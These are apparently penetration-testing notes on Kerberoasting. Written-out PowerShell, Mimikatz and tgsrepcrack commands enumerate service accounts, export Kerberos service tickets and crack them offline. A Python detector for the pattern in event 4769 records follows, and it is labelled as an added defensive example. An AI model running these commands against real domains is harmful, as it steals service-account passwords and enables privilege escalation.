KERBEROASTING
Kerberoasting is mainly used for vertical and horizontal privilege escalation.
Kerberoasting services that run under a machine account is a waste of time, because machine accounts use long, random passwords that cannot be recovered from the ticket hash.
Kerberoasting therefore targets services that run under user accounts.
Enumerating services that use user accounts in the current domain:
Get-NetUser -SPN
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Kerberoasting the user account of a service gives you the same privileges as that user account.
Requesting a new TGS for the service from a user account:
Request-SPNTicket -SPN <SPN FQDN>
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <SPN FQDN>
Verifying the tickets with klist.
Exporting the tickets to crack the hash:
Invoke-Mimikatz -Command '"kerberos::list /export"'
Cracking the TGS ticket with a password list (this will not succeed every time; it depends on the password list):
python .\tgsrepcrack.py <WORDLIST> <TOKEN FILE>
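As an added, defender-side example (not part of the original notes): the TGS requests made in the steps above are recorded by the domain controller as Windows Security event 4769, and the following Python flags an account that requests RC4-encrypted service tickets for several distinct user-account SPNs in a short window. The event records, the threshold and the window are constructed assumptions.

```python
# Added example (not part of the original notes): flag likely Kerberoasting in
# Windows Security event 4769 (Kerberos service ticket requested) records.
# Heuristic: one account pulls RC4-encrypted (0x17) service tickets for several
# distinct user-account SPNs in a short window. Machine-account services (name
# ends in "$") are skipped, matching the note that they are not worth roasting.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC in event 4769

# Constructed sample records; field names follow the 4769 event XML.
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-05-01T10:00:01", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"TimeCreated": "2024-05-01T10:00:02", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_http", "TicketEncryptionType": "0x17"},
    {"TimeCreated": "2024-05-01T10:00:02", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "FILESRV01$", "TicketEncryptionType": "0x17"},  # machine account
    {"TimeCreated": "2024-05-01T10:00:03", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    {"TimeCreated": "2024-05-01T10:05:00", "TargetUserName": "asmith@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12"},  # AES256, normal
]

def is_user_spn(service_name):
    """Machine accounts end in '$'; krbtgt requests are TGT traffic, not roastable TGS."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"

def detect_kerberoasting(events, threshold=3, window=timedelta(minutes=10)):
    """Return {requester: sorted SPNs} for accounts that requested RC4 tickets
    for at least `threshold` distinct user-account SPNs within `window`."""
    per_requester = defaultdict(list)  # requester -> [(time, service name)]
    for ev in events:
        if ev["TicketEncryptionType"].lower() != RC4_HMAC or not is_user_spn(ev["ServiceName"]):
            continue
        per_requester[ev["TargetUserName"]].append(
            (datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"].lower()))
    alerts = {}
    for requester, reqs in per_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # slide the window over each start time
            spns = {spn for t, spn in reqs[i:] if t - start <= window}
            if len(spns) >= threshold:
                alerts[requester] = sorted(spns)
                break
    return alerts
```

Raising the threshold or tightening the window reduces noise from legitimate service-heavy hosts; the AES-only request from asmith is never counted because the heuristic keys on RC4.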